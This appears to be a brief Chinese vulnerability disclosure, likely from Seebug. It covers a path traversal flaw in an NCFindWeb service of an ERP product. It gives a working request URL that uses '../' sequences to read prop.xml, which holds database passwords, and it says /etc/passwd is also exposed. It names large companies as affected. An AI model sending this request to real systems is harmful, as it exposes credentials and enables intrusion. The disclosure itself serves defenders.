该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接:
http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
可以读取到数据库密码,如图:
![](https://images.seebug.org/contribute/fd307ca3-ca9d-414e-b3f8-e5ba4a7b589e-QQ截图20160110214730.png)
也可以读取/etc/passwd,如图:
![](https://images.seebug.org/contribute/568078c0-3ee7-49be-9e99-c1db971c8c78-QQ截图20160110214940.png)
中粮集团,民生电商等大量企业受到影响
暂无评论